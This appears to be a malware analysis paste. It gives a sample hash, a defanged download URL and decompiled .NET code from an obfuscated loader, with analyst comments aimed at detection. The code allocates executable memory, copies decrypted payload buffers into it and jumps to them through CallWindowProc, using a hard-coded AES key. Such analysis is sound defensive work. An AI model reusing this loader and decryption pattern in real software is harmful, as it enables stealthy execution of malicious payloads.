Neonprimetime

2018-06-12 unknown malware

Jun 12th, 2018
  1. found by @James_inthe_box
  2. https://twitter.com/James_inthe_box/status/1006288975621906438
  3. 470636811361e57b48d72095905cc829
  4. https://www.hybrid-analysis.com/sample/dd96a1ab0450b5e856d9171c323ba119d3104b87877dc48d459ab7250e310703?environmentId=120
  5.  
  6. came from
  7. mx2-dokidoki-ne[.]gq/exe/ALVINRIC.exe
  8.  
  9. ------------------------
  10. Interesting .net code
  11. ------------------------
// P/Invoke attributes the analyst pulled out of the decompiled sample; the
// declarations they decorate are not included in this paste. The loader stub
// below (GentekInc) calls two project methods with argument shapes that match
// these two imports, which is presumably why they were listed here -- confirm
// the mapping against the full decompilation rather than relying on the names.
[DllImport("user32.dll", EntryPoint = "CallWindowProc")]
[DllImport("kernel32", EntryPoint = "VirtualAlloc")]
  14.  
  15.  
  16. // DevonEnergyCorporation
  17. using Microsoft.VisualBasic.CompilerServices;
  18. using System;
  19. using System.Reflection;
  20. using System.Runtime.CompilerServices;
  21. using System.Runtime.InteropServices;
  22.  
// Decompiled loader stub; identifiers are obfuscated with company names.
// What the visible code does: allocates two buffers via
// DevonEnergyCorporation.LimitedInc sized to the two inputs' "Length", copies
// each input into its buffer with a late-bound Marshal.Copy, then calls
// DevonEnergyCorporation.StorageTechnologyCorporation with the first buffer,
// the running assembly's path, and the second buffer.
// LimitedInc / StorageTechnologyCorporation are defined elsewhere in the
// sample. Given the DllImport lines in this paste and the argument shapes
// (4 args ending in 4096u, 64u; 5 args starting with a pointer), they look
// like the VirtualAlloc and CallWindowProc imports respectively -- TODO confirm
// in the full binary; the declared P/Invoke signatures are not in the paste.
// Params: both are late-bound objects whose "Length" member is read, so
// presumably byte[] payloads; neither is freed or released afterwards.
private static void GentekInc(object RockwellAutomationInc, object HillenbrandIndustriesInc)
{
    // Despite the name, this is not a window handle: it is an unmanaged copy
    // of the entry assembly's file path, later passed as the 2nd argument of
    // the final call. It is never freed with FreeHGlobal.
    IntPtr hWnd = Marshal.StringToHGlobalUni(Assembly.GetEntryAssembly().Location);
    // Two allocations, each sized to the corresponding input's Length (read via
    // VB late binding). If LimitedInc is the VirtualAlloc import, 4096u is
    // MEM_COMMIT and 64u is PAGE_EXECUTE_READWRITE -- i.e. an RWX region
    // requested by a managed process, which is the detection-relevant part of
    // this routine.
    IntPtr intPtr = (IntPtr)(long)DevonEnergyCorporation.LimitedInc(0u, checked((uint)Convert.ToInt32(RuntimeHelpers.GetObjectValue(NewLateBinding.LateGet(HillenbrandIndustriesInc, null, "Length", new object[0], null, null, null)))), 4096u, 64u);
    IntPtr intPtr2 = (IntPtr)(long)DevonEnergyCorporation.LimitedInc(0u, checked((uint)Convert.ToInt32(RuntimeHelpers.GetObjectValue(NewLateBinding.LateGet(RockwellAutomationInc, null, "Length", new object[0], null, null, null)))), 4096u, 64u);
    // First copy: late-bound Marshal.Copy(source, startIndex, destination, length)
    // with HillenbrandIndustriesInc -> intPtr. The argument array is built as
    // {source, 0, destination, source.Length}; array2/array3/arguments all alias
    // the same array object.
    Type typeFromHandle = typeof(Marshal);
    object[] array = new object[4]
    {
        RuntimeHelpers.GetObjectValue(HillenbrandIndustriesInc),
        0,
        intPtr,
        null
    };
    object[] array2 = array;
    object instance = HillenbrandIndustriesInc;
    array2[3] = RuntimeHelpers.GetObjectValue(NewLateBinding.LateGet(instance, null, "Length", new object[0], null, null, null));
    object[] array3 = array;
    object[] arguments = array3;
    // VB late-binding copy-back mask: positions 0, 2 and 3 may be written back
    // by LateCall if the resolved overload takes them ByRef. The ifs below are
    // the compiler-generated copy-back, not logic the author wrote by hand.
    bool[] array4 = new bool[4]
    {
        true,
        false,
        true,
        true
    };
    NewLateBinding.LateCall(null, typeFromHandle, "Copy", arguments, null, null, array4, true);
    if (array4[0])
    {
        HillenbrandIndustriesInc = RuntimeHelpers.GetObjectValue(array3[0]);
    }
    if (array4[2])
    {
        intPtr = (IntPtr)Conversions.ChangeType(RuntimeHelpers.GetObjectValue(array3[2]), typeof(IntPtr));
    }
    if (array4[3])
    {
        NewLateBinding.LateSetComplex(instance, null, "Length", new object[1]
        {
            RuntimeHelpers.GetObjectValue(array3[3])
        }, null, null, true, false);
    }
    // Second copy: same sequence for RockwellAutomationInc -> intPtr2.
    // Note array3 is re-pointed at array5 and array4 is reallocated, so the
    // copy-back below refers to this call, not the previous one.
    Type typeFromHandle2 = typeof(Marshal);
    object[] array5 = new object[4]
    {
        RuntimeHelpers.GetObjectValue(RockwellAutomationInc),
        0,
        intPtr2,
        null
    };
    object[] array6 = array5;
    instance = RockwellAutomationInc;
    array6[3] = RuntimeHelpers.GetObjectValue(NewLateBinding.LateGet(instance, null, "Length", new object[0], null, null, null));
    array3 = array5;
    object[] arguments2 = array3;
    array4 = new bool[4]
    {
        true,
        false,
        true,
        true
    };
    NewLateBinding.LateCall(null, typeFromHandle2, "Copy", arguments2, null, null, array4, true);
    if (array4[0])
    {
        RockwellAutomationInc = RuntimeHelpers.GetObjectValue(array3[0]);
    }
    if (array4[2])
    {
        intPtr2 = (IntPtr)Conversions.ChangeType(RuntimeHelpers.GetObjectValue(array3[2]), typeof(IntPtr));
    }
    if (array4[3])
    {
        NewLateBinding.LateSetComplex(instance, null, "Length", new object[1]
        {
            RuntimeHelpers.GetObjectValue(array3[3])
        }, null, null, true, false);
    }
    // Hand-off: (first buffer, path string, second buffer, 0, 0). If this is the
    // CallWindowProc import, the first argument sits in the lpPrevWndFunc
    // position, so control would transfer into the bytes just copied there --
    // the familiar "CallWindowProc as trampoline into an RWX buffer" pattern.
    // For detection/forensics: an RWX private allocation followed by a
    // CallWindowProc whose function pointer is not backed by an image is the
    // observable behaviour here.
    DevonEnergyCorporation.StorageTechnologyCorporation(intPtr, hWnd, intPtr2, 0, 0);
}
  102.  
  103.  
// Decompiled payload decryption helper.
// Rijndael is resolved by name at run time (Type.GetType + late-bound "Create")
// rather than referenced directly, so the crypto type does not show up in the
// assembly's static type references -- a small evasion of string/metadata
// scanning. Key (32 bytes) and IV (16 bytes) are hard-coded below, so an
// analyst can reproduce the decryption offline with the same values.
// Cipher mode and padding are not set here, so whatever Rijndael.Create()
// defaults to applies -- confirm when decrypting.
// Param: PoloRalphLaurenCorp is late-bound and only its "Length" is read, so
// presumably the encrypted byte[].
// Returns: the result of TransformFinalBlock over the whole input (as object,
// because the call is late-bound).
private static object WellsFargoCompany(object PoloRalphLaurenCorp)
{
    object objectValue = RuntimeHelpers.GetObjectValue(NewLateBinding.LateGet(null, Type.GetType("System.Security.Cryptography.Rijndael"), "Create", new object[0], null, null, null));
    try
    {
        // CreateDecryptor(key, iv) with the embedded key and IV. The decryptor
        // object (objectValue2) is never disposed; only the Rijndael instance is.
        object objectValue2 = RuntimeHelpers.GetObjectValue(NewLateBinding.LateGet(RuntimeHelpers.GetObjectValue(objectValue), null, "CreateDecryptor", new object[2]
        {
            // 32-byte key (AES-256 sized)
            new byte[32]
            {
                1,
                220,
                220,
                byte.MaxValue,
                62,
                246,
                11,
                77,
                41,
                28,
                227,
                139,
                132,
                238,
                138,
                87,
                29,
                133,
                199,
                5,
                47,
                49,
                183,
                248,
                166,
                43,
                204,
                42,
                106,
                81,
                157,
                132
            },
            // 16-byte IV
            new byte[16]
            {
                41,
                124,
                202,
                177,
                221,
                50,
                38,
                207,
                233,
                5,
                166,
                112,
                203,
                227,
                158,
                107
            }
        }, null, null, null));
        // Single-shot decrypt of the entire input: TransformFinalBlock(input, 0, input.Length).
        return NewLateBinding.LateGet(RuntimeHelpers.GetObjectValue(objectValue2), null, "TransformFinalBlock", new object[3]
        {
            RuntimeHelpers.GetObjectValue(PoloRalphLaurenCorp),
            0,
            RuntimeHelpers.GetObjectValue(NewLateBinding.LateGet(PoloRalphLaurenCorp, null, "Length", new object[0], null, null, null))
        }, null, null, null);
    }
    finally
    {
        // Compiler-generated Using/Dispose for the Rijndael instance.
        if (objectValue != null)
        {
            ((IDisposable)objectValue).Dispose();
        }
    }
}